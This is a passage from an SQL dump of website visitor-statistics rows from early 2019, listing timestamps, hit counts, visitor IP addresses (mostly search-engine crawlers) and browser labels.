e'),(393584,1551477890,1,1,0,0,'46.229.168.134','other'),(393585,1551477934,1,1,0,0,'66.249.64.30','chrome'),(393586,1551478165,1,1,0,0,'54.36.149.24','other'),(393587,1551478259,1,1,0,0,'40.77.167.52','other'),(393588,1551478279,1,1,0,0,'66.249.64.31','chrome'),(393589,1551479062,1,1,0,0,'54.36.148.24','other'),(393590,1551479248,1,1,0,0,'54.36.148.130','other'),(393591,1551479389,1,1,0,0,'54.36.149.20','other'),(393592,1551479966,1,1,0,0,'54.36.149.0','other'),(393593,1551480305,1,1,0,0,'95.163.255.45','other'),(393594,1551480579,2,2,0,0,'95.163.255.48','other'),(393595,1551480775,1,1,0,0,'95.163.255.47','other'),(393596,1551480798,1,1,0,0,'54.36.148.232','other'),(393597,1551480824,1,1,0,0,'54.36.148.253','other'),(393598,1551481155,1,1,0,0,'95.163.255.44','other'),(393599,1551481347,1,1,0,0,'5.45.207.19','other'),(393600,1551481483,1,1,0,0,'95.163.255.42','other'),(393601,1551481628,1,1,0,0,'95.163.255.43','other'),(393602,1551481658,1,1,0,0,'54.36.150.106','other'),(393603,1551481757,1,1,0,0,'66.249.64.29','chrome'),(393604,1551481765,1,1,0,0,'95.163.255.49','other'),(393605,1551481832,1,1,0,0,'66.249.64.62','chrome'),(393606,1551482389,1,1,0,0,'5.188.210.53','chrome'),(393607,1551483025,1,1,0,0,'46.229.168.152','other'),(393608,1551483212,1,1,0,0,'109.201.154.197','other'),(393609,1551484081,1,1,0,0,'207.46.13.97','other'),(393610,1551484178,1,1,0,0,'54.36.150.53','other'),(393611,1551485165,1,1,0,0,'54.36.148.217','other'),(393612,1551485401,1,1,0,0,'54.36.148.209','other'),(393613,1551485502,1,1,0,0,'95.163.255.49','other'),(393614,1551485728,1,1,0,0,'66.249.64.31','chrome'),(393615,1551485866,1,1,0,0,'54.36.150.32','other'),(393616,1551486137,1,1,0,0,'180.76.15.26','other'),(393617,1551486284,1,1,0,0,'46.229.168.137','other'),(393618,1551486304,1,1,0,0,'95.163.255.47','other'),(393619,1551486490,2,2,0,0,'178.154.244.11','other'),(393620,1551486497,1,1,0,0,'95.163.255.49','other'),(393621,1551486698,2,2,0,0,'95.163.255.42','other'),(393622,1551486880,2,2,0,0,'8.29.198.27','other'),(393623,1551486893,1,1,0,0,'54.36.148.85','other'),(393624,1551487020,1,1,0,0,'207.46.13.97','other'),(393625,1551487069,1,1,0,0,'95.163.255.48','other'),(393626,1551487278,1,1,0,0,'5.45.207.19','other'),(393627,1551487284,1,1,0,0,'66.249.64.29','chrome'),(393628,1551487312,1,1,0,0,'95.108.213.4','other'),(393629,1551487433,1,1,0,0,'40.77.167.210','other'),(393630,1551487474,2,2,0,0,'5.45.207.79','other'),(393631,1551487726,1,1,0,0,'54.36.148.80','other'),(393632,1551487803,5,5,0,0,'178.154.244.11','other'),(393633,1551488308,1,1,0,0,'54.36.149.5','other'),(393634,1551488453,1,1,0,0,'54.36.148.144','other'),(393635,1551488460,1,1,0,0,'87.250.224.47','other'),(393636,1551488514,1,1,0,0,'141.8.142.103','other'),(393637,1551488542,2,2,0,0,'5.45.207.19','other'),(393638,1551488598,1,1,0,0,'54.36.148.19','other'),(393639,1551488614,1,1,0,0,'5.45.207.79','other'),(393640,1551488721,1,1,0,0,'178.154.244.11','other'),(393641,1551488884,1,1,0,0,'66.249.64.31','chrome'),(393642,1551488945,1,1,0,0,'66.249.64.30','chrome'),(393643,1551489320,1,1,0,0,'54.36.149.45','other'),(393644,1551489683,1,1,0,0,'54.36.148.12','other'),(393645,1551490146,1,1,0,0,'54.36.150.170','other'),(393646,1551490646,1,1,0,0,'54.36.148.8','other'),(393647,1551490672,1,1,0,0,'66.249.64.29','chrome'),(393648,1551490698,1,1,0,0,'216.244.66.241','other'),(393649,1551491088,1,1,0,0,'54.36.148.176','other'),(393650,1551491089,1,1,0,0,'54.36.148.95','other'),(393651,1551491162,1,1,0,0,'54.36.148.196','other'),(393652,1551491235,1,1,0,0,'95.163.255.45','other'),(393653,1551491430,1,1,0,0,'207.46.13.97','other'),(393654,1551491450,1,1,0,0,'54.36.148.205','other'),(393655,1551491805,1,1,0,0,'40.77.167.52','other'),(393656,1551491855,1,1,0,0,'54.36.150.44','other'),(393657,1551492200,1,1,0,0,'66.249.64.30','chrome'),(393658,1551492299,1,1,0,0,'66.249.64.29','chrome'),(393659,1551492326,1,1,0,0,'95.163.255.49','other'),(393660,1551492468,2,2,0,0,'95.163.255.43','other'),(393661,1551492635,1,1,0,0,'95.163.255.42','other'),(393662,1551492799,2,2,0,0,'95.163.255.47','other'),(393663,1551492806,1,1,0,0,'54.36.148.171','other'),(393664,1551492974,1,1,0,0,'54.36.148.194','other'),(393665,1551493318,1,1,0,0,'54.36.150.67','other'),(393666,1551493465,1,1,0,0,'216.244.66.241','other'),(393667,1551493483,3,3,0,0,'66.249.64.30','chrome'),(393668,1551493758,1,1,0,0,'40.77.167.210','other'),(393669,1551493930,2,2,0,0,'34.211.187.195','chrome'),(393670,1551494001,1,1,0,0,'66.249.64.31','chrome'),(393671,1551494025,1,1,0,0,'54.36.150.100','other'),(393672,1551494747,1,1,0,0,'54.36.150.35','other'),(393673,1551495321,1,1,0,0,'54.36.150.163','other'),(393674,1551495744,1,1,0,0,'54.36.148.130','other'),(393675,1551495965,1,1,0,0,'46.229.168.148','other'),(393676,1551496375,1,1,0,0,'207.46.13.97','other'),(393677,1551496590,1,1,0,0,'46.229.168.135','other'),(393678,1551496862,1,1,0,0,'207.46.13.113','other'),(393679,1551497286,1,1,0,0,'54.36.148.28','other'),(393680,1551497288,1,1,0,0,'95.163.255.46','other'),(393681,1551497322,1,1,0,0,'207.46.13.97','other'),(393682,1551497484,1,1,0,0,'54.36.148.232','other'),(393683,1551497736,1,1,0,0,'8.29.198.25','other'),(393684,1551497790,1,1,0,0,'54.36.150.55','other'),(393685,1551497853,1,1,0,0,'8.29.198.26','other'),(393686,1551498063,1,1,0,0,'194.113.106.124','chrome'),(393687,1551498092,1,1,0,0,'54.36.148.130','other'),(393688,1551498103,1,1,0,0,'54.36.149.69','other'),(393689,1551498216,1,1,0,0,'46.229.168.139','other'),(393690,1551498300,1,1,0,0,'95.163.255.47','other'),(393691,1551498326,1,1,0,0,'66.249.64.31','chrome'),(393692,1551498482,1,1,0,0,'95.163.255.48','other'),(393693,1551498793,1,1,0,0,'54.36.148.106','other'),(393694,1551498835,1,1,0,0,'180.76.15.148','other'),(393695,1551498988,1,1,0,0,'46.229.168.135','other'),(393696,1551499154,1,1,0,0,'54.36.148.39','other'),(393697,1551499205,1,1,0,0,'207.46.13.83','other'),(393698,1551499769,1,1,0,0,'54.36.150.91','other'),(393699,1551500038,1,1,0,0,'54.36.150.117','other'),(393700,1551500496,1,1,0,0,'54.36.150.100','other'),(393701,1551500656,1,1,0,0,'54.36.148.41','other'),(393702,1551500782,1,1,0,0,'207.46.13.84','other'),(393703,1551500896,1,1,0,0,'54.36.150.90','other'),(393704,1551501084,1,1,0,0,'54.36.149.91','other'),(393705,1551501266,1,1,0,0,'66.249.64.29','chrome'),(393706,1551501367,1,1,0,0,'46.229.168.149','other'),(393707,1551501787,1,1,0,0,'40.77.167.172','other'),(393708,1551501893,1,1,0,0,'54.36.148.224','other'),(393709,1551502184,1,1,0,0,'207.46.13.97','other'),(393710,1551502738,1,1,0,0,'54.36.148.34','other'),(393711,1551502794,2,2,0,0,'66.249.64.29','chrome'),(393712,1551502896,1,1,0,0,'95.163.255.46','other'),(393713,1551503311,1,1,0,0,'66.249.64.30','chrome'),(393714,1551503375,1,1,0,0,'54.36.150.171','other'),(393715,1551503414,1,1,0,0,'54.36.148.131','other'),(393716,1551503429,1,1,0,0,'46.229.168.144','other'),(393717,1551503836,2,2,0,0,'95.163.255.49','other'),(393718,1551504006,1,1,0,0,'95.163.255.48','other'),(393719,1551504168,1,1,0,0,'95.163.255.43','other'),(393720,1551504311,1,1,0,0,'40.77.167.172','other'),(393721,1551504557,1,1,0,0,'46.118.126.87','chrome'),(393722,1551504848,1,1,0,0,'95.163.255.47','other'),(393723,1551504868,1,1,0,0,'54.36.149.102','other'),(393724,1551504890,3,3,0,0,'66.249.64.29','chrome'),(393725,1551505365,1,1,0,0,'46.229.168.130','other'),(393726,1551505869,1,1,0,0,'207.46.13.84','other'),(393727,1551505914,1,1,0,0,'66.249.64.30','chrome'),(393728,1551506209,1,1,0,0,'216.244.66.241','other'),(393729,1551506340,1,1,0,0,'54.36.148.49','other'),(393730,1551506528,1,1,0,0,'54.36.148.69','other'),(393731,1551506562,1,1,0,0,'54.36.148.177','other'),(393732,1551506717,1,1,0,0,'54.36.150.24','other'),(393733,1551506722,1,1,0,0,'54.36.148.12','other'),(393734,1551507373,1,1,0,0,'54.36.150.50','other'),(393735,1551507573,1,1,0,0,'54.36.148.208','other'),(393736,1551507652,1,1,0,0,'207.46.13.241','other'),(393737,1551508301,1,1,0,0,'54.36.150.169','other'),(393738,1551508306,1,1,0,0,'66.249.64.29','chrome'),(393739,1551508407,1,1,0,0,'95.163.255.46','other'),(393740,1551508490,1,1,0,0,'66.249.64.62','chrome'),(393741,1551508610,1,1,0,0,'8.29.198.26','other'),(393742,1551508715,1,1,0,0,'8.29.198.27','other'),(393743,1551508789,7,7,0,0,'83.25.37.121','firefox'),(393744,1551508795,3,3,0,0,'83.25.37.121','chrome'),(393745,1551509266,1,1,0,0,'54.36.148.194','other'),(393746,1551509624,1,1,0,0,'95.163.255.45','other'),(393747,1551509698,1,1,0,0,'95.163.255.46','other'),(393748,1551509784,1,1,0,0,'95.163.255.48','other'),(393749,1551509827,1,1,0,0,'157.55.39.196','other'),(393750,1551509909,1,1,0,0,'66.249.64.31','chrome'),(393751,1551509925,1,1,0,0,'95.163.255.47','other'),(393752,1551509950,1,1,0,0,'54.36.148.211','other'),(393753,1551510434,1,1,0,0,'46.229.168.144','other'),(393754,1551510535,1,1,0,0,'54.36.149.70','other'),(393755,1551510621,1,1,0,0,'54.36.148.58','other'),(393756,1551510686,1,1,0,0,'54.36.150.138','other'),(393757,1551510845,1,1,0,0,'157.55.39.107','other'),(393758,1551511122,1,1,0,0,'87.118.116.12','other'),(393759,1551511671,1,1,0,0,'54.36.150.22','other'),(393760,1551512098,1,1,0,0,'54.36.150.10','other'),(393761,1551512549,1,1,0,0,'54.36.148.74','other'),(393762,1551512601,1,1,0,0,'54.36.148.22','other'),(393763,1551512743,1,1,0,0,'54.36.149.3','other'),(393764,1551512889,2,2,0,0,'157.55.39.196','other'),(393765,1551513011,1,1,0,0,'46.229.168.145','other'),(393766,1551513082,1,1,0,0,'54.36.150.135','other'),(393767,1551513143,3,3,0,0,'5.45.207.19','other'),(393768,1551513328,1,1,0,0,'95.108.213.4','other'),(393769,1551513343,1,1,0,0,'5.45.207.79','other'),(393770,1551513533,6,6,0,0,'178.154.244.11','other'),(393771,1551513554,1,1,0,0,'54.36.150.71','other'),(393772,1551513683,1,1,0,0,'46.229.168.140','other'),(393773,1551513942,1,1,0,0,'66.249.64.29','chrome'),(393774,1551513950,1,1,0,0,'54.36.148.67','other'),(393775,1551513966,1,1,0,0,'66.249.64.30','chrome'),(393776,1551513993,2,2,0,0,'216.244.66.241','other'),(393777,1551514144,1,1,0,0,'87.250.224.47','other'),(393778,1551514231,2,2,0,0,'5.45.207.19','other'),(393779,1551514530,1,1,0,0,'178.154.244.11','other'),(393780,1551514534,1,1,0,0,'54.36.148.85','other'),(393781,1551514620,1,1,0,0,'5.45.207.79','other'),(393782,1551515207,1,1,0,0,'54.36.148.90','other'),(393783,1551515296,1,1,0,0,'95.163.255.45','other'),(393784,1551515354,1,1,0,0,'46.229.168.130','other'),(393785,1551515467,3,3,0,0,'95.163.255.47','other'),(393786,1551515632,1,1,0,0,'95.163.255.42','other'),(393787,1551515816,2,2,0,0,'95.163.255.48','other'),(393788,1551515974,1,1,0,0,'54.36.148.87','other'),(393789,1551515975,1,1,0,0,'95.163.255.49','other'),(393790,1551516111,1,1,0,0,'95.163.255.43','other'),(393791,1551516138,1,1,0,0,'54.36.148.109','other'),(393792,1551516396,1,1,0,0,'46.229.168.129','other'),(393793,1551516468,1,1,0,0,'95.163.255.44','other'),(393794,1551516878,1,1,0,0,'66.249.64.30','chrome'),(393795,1551516916,1,1,0,0,'46.229.168.138','other'),(393796,1551517180,1,1,0,0,'157.55.39.107','other'),(393797,1551517220,1,1,0,0,'54.36.150.111','other'),(393798,1551517233,1,1,0,0,'54.36.148.96','other'),(393799,1551517386,1,1,0,0,'91.209.11.236','other'),(393800,1551517477,2,2,0,0,'66.249.64.31','chrome'),(393801,1551517571,1,1,0,0,'54.36.149.24','other'),(393802,1551517657,1,1,0,0,'178.154.244.11','other'),(393803,1551517677,1,1,0,0,'66.249.64.29','chrome'),(393804,1551518340,1,1,0,0,'54.36.150.1','other'),(393805,1551518599,1,1,0,0,'54.36.148.2','other'),(393806,1551518686,1,1,0,0,'54.36.149.88','other'),(393807,1551518729,1,1,0,0,'54.36.150.165','other'),(393808,1551519220,2,2,0,0,'216.244.66.241','other'),(393809,1551519467,2,2,0,0,'8.29.198.26','other'),(393810,1551520398,1,1,0,0,'66.249.64.60','chrome'),(393811,1551520402,1,1,0,0,'54.36.149.28','other'),(393812,1551520539,1,1,0,0,'66.249.64.30','chrome'),(393813,1551520936,1,1,0,0,'54.36.149.44','other'),(393814,1551521113,2,2,0,0,'95.163.255.43','other'),(393815,1551521270,2,2,0,0,'95.163.255.46','other'),(393816,1551521413,1,1,0,0,'66.249.64.29','chrome'),(393817,1551521866,1,1,0,0,'54.36.148.72','other'),(393818,1551521911,1,1,0,0,'95.163.255.49','other'),(393819,1551522109,1,1,0,0,'66.249.64.62','chrome'),(393820,1551522128,1,1,0,0,'66.249.64.60','chrome'),(393821,1551522157,1,1,0,0,'54.36.150.88','other'),(393822,1551522325,3,0,3,0,'66.249.64.29',''),(393823,1551522533,1,1,0,0,'157.55.39.196','other'),(393824,1551523082,1,1,0,0,'54.36.150.16','other'),(393825,1551523848,1,1,0,0,'54.36.149.20','other'),(393826,1551523879,1,1,0,0,'54.36.149.6','other'),(393827,1551523943,1,1,0,0,'40.77.167.14','other'),(393828,1551524362,1,1,0,0,'54.36.150.68','other'),(393829,1551524442,1,1,0,0,'54.36.148.236','other'),(393830,1551524526,1,1,0,0,'54.36.149.105','other'),(393831,1551524543,1,1,0,0,'66.249.64.31','chrome'),(393832,1551524621,1,1,0,0,'54.36.150.36','other'),(393833,1551524865,1,1,0,0,'157.55.39.107','other'),(393834,1551525135,1,1,0,0,'54.36.149.73','other'),(393835,1551525240,1,1,0,0,'54.36.148.2','other'),(393836,1551525301,1,1,0,0,'66.249.64.29','chrome'),(393837,1551525367,1,1,0,0,'180.76.15.34','other'),(393838,1551525760,1,1,0,0,'46.211.1.121','chrome'),(393839,1551526335,2,2,0,0,'95.163.255.44','other'),(393840,1551526512,1,1,0,0,'54.36.150.173','other'),(393841,1551526592,1,1,0,0,'54.36.148.138','other'),(393842,1551526717,2,2,0,0,'95.163.255.43','other'),(393843,1551526886,1,1,0,0,'51.255.65.46','other'),(393844,1551527061,1,1,0,0,'95.163.255.46','other'),(393845,1551527114,1,1,0,0,'54.36.150.127','other'),(393846,1551527358,1,1,0,0,'157.55.39.107','other'),(393847,1551527429,1,1,0,0,'66.249.64.29','chrome'),(393848,1551527468,2,2,0,0,'66.249.64.30','chrome'),(393849,1551527871,1,1,0,0,'54.36.149.62','other'),(393850,1551528124,1,1,0,0,'54.36.148.61','other'),(393851,1551528362,1,1,0,0,'54.36.150.43','other'),(393852,1551529081,2,2,0,0,'66.249.64.30','chrome'),(393853,1551529100,1,1,0,0,'40.77.167.14','other'),(393854,1551529490,2,2,0,0,'66.249.64.29','chrome'),(393855,1551529947,1,1,0,0,'157.55.39.107','other'),(393856,1551530016,1,1,0,0,'62.205.134.182','chrome'),(393857,1551530031,1,1,0,0,'54.36.150.70','other'),(393858,1551530161,1,1,0,0,'180.76.15.152','other'),(393859,1551530272,1,1,0,0,'66.249.64.30','chrome'),(393860,1551530331,1,1,0,0,'8.29.198.26','other'),(393861,1551530411,1,1,0,0,'54.36.148.115','other'),(393862,1551530448,1,1,0,0,'8.29.198.27','other'),(393863,1551530513,1,1,0,0,'157.55.39.103','other'),(393864,1551530917,2,2,0,0,'66.249.64.31','chrome'),(393865,1551530947,1,1,0,0,'54.36.148.22','other'),(393866,1551531117,1,1,0,0,'54.36.150.104','other'),(393867,1551531165,1,1,0,0,'66.249.64.29','chrome'),(393868,1551531538,1,1,0,0,'66.249.64.30','chrome'),(393869,1551531561,1,1,0,0,'157.55.39.103','other'),(393870,1551531658,2,2,0,0,'40.77.167.92','other'),(393871,1551531910,1,1,0,0,'54.36.150.86','other'),(393872,1551532101,1,1,0,0,'91.196.178.171','chrome'),(393873,1551532284,2,2,0,0,'157.55.39.107','other'),(393874,1551532364,2,2,0,0,'95.163.255.45','other'),(393875,1551532611,1,1,0,0,'95.163.255.48','other'),(393876,1551532639,1,1,0,0,'5.188.210.53','chrome'),(393877,1551532722,1,1,0,0,'66.249.64.29','chrome'),(393878,1551532805,1,1,0,0,'95.163.255.49','other'),(393879,1551532908,1,1,0,0,'216.244.66.241','other'),(393880,1551532986,1,1,0,0,'95.163.255.42','other'),(393881,1551533110,1,1,0,0,'54.36.148.116','other'),(393882,1551533416,1,1,0,0,'54.36.150.37','other'),(393883,1551533733,1,1,0,0,'46.229.168.138','other'),(393884,1551533981,1,1,0,0,'54.36.148.255','other'),(393885,1551534153,1,1,0,0,'54.36.148.8','other'),(393886,1551534443,1,1,0,0,'54.36.148.34','other'),(393887,1551534497,1,1,0,0,'40.77.167.92','other'),(393888,1551534756,1,1,0,0,'54.36.150.160','other'),(393889,1551535365,1,1,0,0,'95.163.255.102','other'),(393890,1551536218,1,1,0,0,'54.36.150.182','other'),(393891,1551536258,1,1,0,0,'54.36.150.16','other'),(393892,1551536504,1,1,0,0,'95.163.255.46','other'),(393893,1551537201,1,1,0,0,'66.249.64.31','chrome'),(393894,1551537326,1,1,0,0,'66.249.64.30','chrome'),(393895,1551537401,1,1,0,0,'54.36.148.18','other'),(393896,1551537412,1,1,0,0,'40.77.167.14','other'),(393897,1551537660,1,1,0,0,'216.244.66.241','other'),(393898,1551537777,1,1,0,0,'54.36.149.97','other'),(393899,1551537896,1,1,0,0,'54.36.150.53','other'),(393900,1551538083,2,2,0,0,'95.163.255.46','other'),(393901,1551538208,1,1,0,0,'54.36.149.2','other'),(393902,1551538277,1,1,0,0,'95.163.255.47','other'),(393903,1551538311,1,1,0,0,'54.36.150.135','other'),(393904,1551538439,1,1,0,0,'40.77.167.217','other'),(393905,1551538445,1,1,0,0,'54.36.148.124','other'),(393906,1551538462,1,1,0,0,'95.163.255.44','other'),(393907,1551538672,1,1,0,0,'40.77.167.14','other'),(393908,1551538769,1,1,0,0,'216.244.66.241','other'),(393909,1551538783,1,1,0,0,'95.163.255.45','other'),(393910,1551538939,1,1,0,0,'95.163.255.49','other'),(393911,1551539037,1,1,0,0,'54.36.148.203','other'),(393912,1551539101,1,1,0,0,'52.53.201.78','chrome'),(393913,1551539183,1,1,0,0,'54.36.148.172','other'),(393914,1551539238,1,1,0,0,'54.36.148.161','other'),(393915,1551539922,1,1,0,0,'54.36.150.59','other'),(393916,1551540714,1,1,0,0,'216.244.66.241','other'),(393917,1551540728,1,1,0,0,'109.201.154.198','other'),(393918,1551540765,1,1,0,0,'54.36.150.10','other'),(393919,1551540852,1,1,0,0,'54.36.148.233','other'),(393920,1551540910,3,3,0,0,'66.249.64.29','chrome'),(393921,1551541077,1,1,0,0,'54.36.148.89','other'),(393922,1551541194,2,2,0,0,'8.29.198.27','other'),(393923,1551541289,1,1,0,0,'54.36.148.58','other'),(393924,1551541512,1,1,0,0,'66.249.64.30','chrome'),(393925,1551541545,1,1,0,0,'54.36.148.213','other'),(393926,1551541827,1,1,0,0,'91.196.178.133','firefox'),(393927,1551542008,1,1,0,0,'66.249.64.60','chrome'),(393928,1551542049,1,1,0,0,'95.163.255.48','other'),(393929,1551542159,1,1,0,0,'54.36.148.109','other'),(393930,1551542284,2,2,0,0,'66.249.64.31','chrome'),(393931,1551542543,1,1,0,0,'54.36.148.68','other'),(393932,1551542779,1,1,0,0,'54.36.150.84','other'),(393933,1551542891,1,1,0,0,'207.46.13.118','other'),(393934,1551542933,1,1,0,0,'54.36.150.76','other'),(393935,1551543099,1,1,0,0,'46.229.168.129','other'),(393936,1551543203,1,1,0,0,'54.36.150.99','other'),(393937,1551543274,2,2,0,0,'66.249.64.29','chrome'),(393938,1551543312,1,1,0,0,'207.46.13.119','other'),(393939,1551543565,1,1,0,0,'46.229.168.134','other'),(393940,1551543641,1,1,0,0,'54.36.149.14','other'),(393941,1551543710,1,1,0,0,'66.249.64.30','chrome'),(393942,1551543978,1,1,0,0,'54.36.148.197','other'),(393943,1551544418,1,1,0,0,'54.36.148.40','other'),(393944,1551544550,1,1,0,0,'5.188.210.65','chrome'),(393945,1551544627,1,1,0,0,'82.145.211.140','other'),(393946,1551544706,1,1,0,0,'82.145.210.243','other'),(393947,1551544771,1,1,0,0,'54.36.149.69','other'),(393948,1551544906,1,1,0,0,'207.46.13.229','other'),(393949,1551545134,3,3,0,0,'5.45.207.19','other'),(393950,1551545173,1,1,0,0,'178.154.244.11','other'),(393951,1551545427,1,1,0,0,'46.229.168.132','other'),(393952,1551545441,1,1,0,0,'54.36.148.188','other'),(393953,1551545681,2,2,0,0,'87.250.224.47','other'),(393954,1551545741,1,1,0,0,'54.36.150.180','other'),(393955,1551545853,1,1,0,0,'46.211.26.142','chrome'),(393956,1551545939,1,1,0,0,'37.9.113.148','other'),(393957,1551545959,3,3,0,0,'95.108.213.4','other'),(393958,1551545960,1,1,0,0,'109.201.154.165','other'),(393959,1551546101,1,1,0,0,'5.45.207.8','other'),(393960,1551546104,1,1,0,0,'141.8.142.103','other'),(393961,1551546116,1,1,0,0,'46.229.168.148','other'),(393962,1551546263,1,1,0,0,'37.9.113.20','other'),(393963,1551546322,1,1,0,0,'54.36.149.103','other'),(393964,1551546405,6,6,0,0,'45.32.117.1','chrome'),(393965,1551546458,1,1,0,0,'54.36.148.67','other'),(393966,1551546459,1,1,0,0,'54.36.148.15','other'),(393967,1551546521,1,1,0,0,'54.36.148.82','other'),(393968,1551546564,2,2,0,0,'5.45.207.19','other'),(393969,1551546578,1,1,0,0,'66.249.64.58','chrome'),(393970,1551546734,1,1,0,0,'54.36.148.54','other'),(393971,1551546897,1,1,0,0,'66.249.64.30','chrome'),(393972,1551546947,1,1,0,0,'92.112.125.252','chrome'),(393973,1551547160,1,1,0,0,'66.249.64.62','chrome'),(393974,1551547166,1,1,0,0,'87.250.224.81','other'),(393975,1551547234,1,1,0,0,'207.46.13.229','other'),(393976,1551547397,1,1,0,0,'54.36.148.223','other'),(393977,1551547412,1,1,0,0,'95.108.181.54','other'),(393978,1551547500,1,1,0,0,'46.229.168.132','other'),(393979,1551547603,1,1,0,0,'54.36.150.26','other'),(393980,1551547756,1,1,0,0,'54.36.150.150','other'),(393981,1551547759,1,1,0,0,'178.154.244.65','other'),(393982,1551547837,1,1,0,0,'5.45.207.8','other'),(393983,1551547873,1,1,0,0,'5.45.207.79','other'),(393984,1551547875,1,1,0,0,'178.154.200.48','other'),(393985,1551547896,1,1,0,0,'37.9.113.20','other'),(393986,1551548103,1,1,0,0,'157.55.39.244','other'),(393987,1551548172,1,1,0,0,'87.250.224.47','other'),(393988,1551548333,3,3,0,0,'66.249.64.30','chrome'),(393989,1551548391,1,1,0,0,'54.36.148.232','other'),(393990,1551548588,1,1,0,0,'178.154.244.11','other'),(393991,1551548667,3,3,0,0,'66.249.64.31','chrome'),(393992,1551548718,1,1,0,0,'66.249.64.29','chrome'),(393993,1551548757,1,1,0,0,'37.9.113.148','other'),(393994,1551548851,1,1,0,0,'66.249.64.58','chrome'),(393995,1551549228,1,1,0,0,'95.163.255.44','other'),(393996,1551549248,1,1,0,0,'66.249.64.30','chrome'),(393997,1551549866,1,1,0,0,'66.249.64.29','chrome'),(393998,1551550252,1,1,0,0,'95.163.255.44','other'),(393999,1551550335,1,1,0,0,'194.113.106.11','chrome'),(394000,1551550668,1,1,0,0,'54.36.149.54','other'),(394001,1551550760,1,1,0,0,'5.188.210.65','chrome'),(394002,1551551023,1,1,0,0,'66.249.64.58','chrome'),(394003,1551551289,1,1,0,0,'54.36.150.132','other'),(394004,1551551317,1,1,0,0,'54.36.150.55','other'),(394005,1551551597,1,1,0,0,'66.249.64.30','chrome'),(394006,1551551624,1,1,0,0,'66.249.64.62','chrome'),(394007,1551551650,1,1,0,0,'54.36.150.189','other'),(394008,1551551659,1,1,0,0,'54.36.148.57','other'),(394009,1551551820,1,1,0,0,'54.36.150.67','other'),(394010,1551551947,1,1,0,0,'54.36.150.87','other'),(394011,1551552072,1,1,0,0,'8.29.198.27','other'),(394012,1551552198,1,1,0,0,'8.29.198.25','other'),(394013,1551552511,1,1,0,0,'54.36.148.159','other'),(394014,1551552588,1,1,0,0,'207.46.13.118','other'),(394015,1551552913,1,1,0,0,'66.249.64.62','chrome'),(394016,1551552971,1,1,0,0,'54.36.148.193','other'),(394017,1551553087,1,1,0,0,'54.36.150.50','other'),(394018,1551553324,2,2,0,0,'40.77.167.140','other'),(394019,1551553369,2,2,0,0,'66.249.64.31','chrome'),(394020,1551553420,1,1,0,0,'66.249.64.30','chrome'),(394021,1551553443,1,1,0,0,'54.36.148.145','other'),(394022,1551553633,1,1,0,0,'95.163.255.47','other'),(394023,1551553661,1,1,0,0,'54.36.148.93','other'),(394024,1551553717,1,1,0,0,'54.36.150.100','other'),(394025,1551554785,1,1,0,0,'104.132.61.91','chrome'),(394026,1551555151,3,3,0,0,'66.249.64.31','chrome'),(394027,1551555214,1,1,0,0,'54.36.148.247','other'),(394028,1551555436,1,1,0,0,'95.163.255.42','other'),(394029,1551555505,1,1,0,0,'66.249.64.30','chrome'),(394030,1551555646,1,1,0,0,'66.249.64.60','chrome'),(394031,1551555736,1,1,0,0,'66.249.64.62','chrome'),(394032,1551555785,2,2,0,0,'66.249.64.29','chrome'),(394033,1551555940,1,1,0,0,'40.77.167.18','other'),(394034,1551556306,1,1,0,0,'54.36.150.45','other'),(394035,1551556419,1,1,0,0,'54.36.150.165','other'),(394036,1551556740,1,1,0,0,'54.36.149.69','other'),(394037,1551557011,1,1,0,0,'54.36.148.173','other'),(394038,1551557154,1,1,0,0,'54.36.150.25','other'),(394039,1551557286,3,3,0,0,'66.249.64.60','chrome'),(394040,1551557449,3,3,0,0,'40.77.167.40','other'),(394041,1551557538,1,1,0,0,'54.36.149.34','other'),(394042,1551557688,1,1,0,0,'54.36.148.155','other'),(394043,1551558837,1,1,0,0,'54.36.150.174','other'),(394044,1551558988,2,2,0,0,'66.249.64.30','chrome'),(394045,1551559318,1,1,0,0,'40.77.167.40','other'),(394046,1551559414,2,2,0,0,'66.249.64.62','chrome'),(394047,1551559430,1,1,0,0,'216.244.66.241','other'),(394048,1551559600,2,2,0,0,'66.249.64.31','chrome'),(394049,1551559838,1,1,0,0,'54.36.150.110','other'),(394050,1551560069,2,2,0,0,'157.55.39.180','other'),(394051,1551560319,1,1,0,0,'54.36.148.111','other'),(394052,1551560980,1,1,0,0,'54.36.148.202','other'),(394053,1551561188,1,1,0,0,'54.36.149.73','other'),(394054,1551561227,1,1,0,0,'54.36.149.102','other'),(394055,1551561461,1,1,0,0,'54.36.148.212','other'),(394056,1551561756,1,1,0,0,'54.36.148.78','other'),(394057,1551561928,1,1,0,0,'40.77.167.63','other'),(394058,1551561952,1,1,0,0,'66.249.93.219','chrome'),(394059,1551562249,1,1,0,0,'54.36.150.174','other'),(394060,1551562540,1,1,0,0,'54.36.148.236','other'),(394061,1551562591,1,1,0,0,'66.249.64.29','chrome'),(394062,1551562755,1,1,0,0,'157.55.39.180','other'),(394063,1551562935,2,2,0,0,'8.29.198.25','other'),(394064,1551562956,1,1,0,0,'54.36.148.25','other'),(394065,1551563069,1,1,0,0,'54.36.150.5','other'),(394066,1551563588,1,1,0,0,'46.229.168.137','other'),(394067,1551563812,1,1,0,0,'54.36.150.89','other'),(394068,1551564054,1,1,0,0,'54.36.150.104','other'),(394069,1551564268,1,1,0,0,'54.36.148.201','other'),(394070,1551564278,1,1,0,0,'46.229.168.139','other'),(394071,1551564332,1,1,0,0,'54.36.149.85','other'),(394072,1551564451,1,1,0,0,'66.249.64.30','chrome'),(394073,1551564518,1,1,0,0,'54.36.150.146','other'),(394074,1551564537,1,1,0,0,'216.244.66.241','other'),(394075,1551564538,1,1,0,0,'66.249.64.29','chrome'),(394076,1551564573,1,1,0,0,'54.36.149.34','other'),(394077,1551564588,1,1,0,0,'178.154.244.11','other'),(394078,1551564741,1,1,0,0,'157.55.39.180','other'),(394079,1551564917,1,1,0,0,'66.249.64.60','chrome'),(394080,1551565009,1,1,0,0,'95.163.255.49','other'),(394081,1551565012,1,1,0,0,'95.163.255.46','other'),(394082,1551565821,1,1,0,0,'94.180.219.194','msie'),(394083,1551566045,1,1,0,0,'54.36.150.50','other'),(394084,1551566496,1,1,0,0,'66.249.64.30','chrome'),(394085,1551566848,2,2,0,0,'66.249.64.29','chrome'),(394086,1551566856,1,1,0,0,'54.36.148.154','other'),(394087,1551566907,1,1,0,0,'66.249.64.58','chrome'),(394088,1551566989,1,1,0,0,'95.163.255.45','other'),(394089,1551567058,1,1,0,0,'66.249.64.31','chrome'),(394090,1551567189,1,1,0,0,'54.36.148.40','other'),(394091,1551567341,1,1,0,0,'207.46.13.63','other'),(394092,1551567376,1,1,0,0,'5.188.210.53','chrome'),(394093,1551567492,1,1,0,0,'54.36.150.55','other'